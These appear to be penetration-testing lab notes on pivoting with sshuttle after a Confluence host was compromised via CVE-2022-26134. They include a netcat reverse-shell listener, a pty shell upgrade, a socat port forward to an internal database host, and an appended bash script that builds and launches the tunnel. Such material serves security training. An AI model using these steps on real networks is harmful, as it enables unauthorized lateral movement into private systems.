Sshuttle

sshuttle is a tool that creates a VPN-like tunnel over SSH. It transparently routes traffic to specified subnets through an SSH connection. It requires root privileges on the client (attacker) machine and Python 3 on the SSH server (pivot host).

It is particularly useful when classic SSH dynamic port forwarding (a SOCKS proxy plus proxychains) becomes cumbersome to manage.

Tunnelling scenario recap:

  1. Got a reverse shell on CONFLUENCE01 (192.168.125.63) via CVE-2022-26134.

  2. We can SSH to PGDATABASE01 (10.4.125.215) from CONFLUENCE01.

  3. Our goal is to access the following internal networks: 10.4.125.0/24 and 172.16.125.0/24.

We can set up a port forward on CONFLUENCE01, forwarding local port 2222 to PGDATABASE01:22 using socat. This makes PGDATABASE01’s SSH service available on CONFLUENCE01:2222.

$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22
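The sshuttle step that the socat forward above prepares for, as an added example that is not part of the original page: it composes the sshuttle invocation that uses CONFLUENCE01:2222 as its SSH endpoint (so the session actually lands on PGDATABASE01) and validates the subnet list before anything is routed. The SSH user on PGDATABASE01 is not given on the page, so PIVOT_USER is a placeholder.

```shell
#!/usr/bin/env bash
# Added example, not part of the original page: compose (and optionally launch) the
# sshuttle session that goes through the socat forward on CONFLUENCE01:2222, so that
# traffic for the two internal networks is routed via PGDATABASE01.
# Assumption: PIVOT_USER is a placeholder for the SSH user on PGDATABASE01 (not on the page).

PIVOT_HOST="192.168.125.63"                 # CONFLUENCE01, where socat listens
PIVOT_PORT="2222"                           # socat TCP-LISTEN port -> PGDATABASE01:22
PIVOT_USER="${PIVOT_USER:-PLACEHOLDER_USER}"
TARGET_NETS="10.4.125.0/24 172.16.125.0/24"

# Return 0 if $1 is a well-formed IPv4 CIDR (four 0-255 octets, prefix 0-32), else 1.
is_cidr() {
  local ip="${1%/*}" pfx="${1#*/}"
  [ "$ip" != "$1" ] || return 1                    # no '/' present
  case "$pfx" in ''|*[!0-9]*) return 1 ;; esac
  [ "$pfx" -le 32 ] || return 1
  local IFS=.
  set -- $ip                                       # split octets on '.'
  [ $# -eq 4 ] || return 1
  local o
  for o in "$@"; do
    case "$o" in ''|*[!0-9]*) return 1 ;; esac
    [ "$o" -le 255 ] || return 1
  done
  return 0
}

# Print the sshuttle command line for user@host:port plus the given subnets;
# refuse (return 1) if any subnet is malformed, so a typo never widens the routed scope.
build_sshuttle_cmd() {
  local user="$1" host="$2" port="$3"; shift 3
  local net cmd="sshuttle -v -r ${user}@${host}:${port}"
  [ $# -gt 0 ] || { echo "no subnets given" >&2; return 1; }
  for net in "$@"; do
    is_cidr "$net" || { echo "invalid subnet: $net" >&2; return 1; }
    cmd="$cmd $net"
  done
  printf '%s\n' "$cmd"
}

# Launch only when explicitly requested; sshuttle needs root on the client.
if [ "${RUN_PIVOT:-0}" = "1" ]; then
  [ "$(id -u)" -eq 0 ] || { echo "run as root on the client machine" >&2; exit 1; }
  cmd="$(build_sshuttle_cmd "$PIVOT_USER" "$PIVOT_HOST" "$PIVOT_PORT" $TARGET_NETS)" || exit 1
  echo "+ $cmd"
  exec $cmd
fi
```

Without RUN_PIVOT=1 the script only defines the helpers, so it can be sourced and checked before the tunnel is started.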
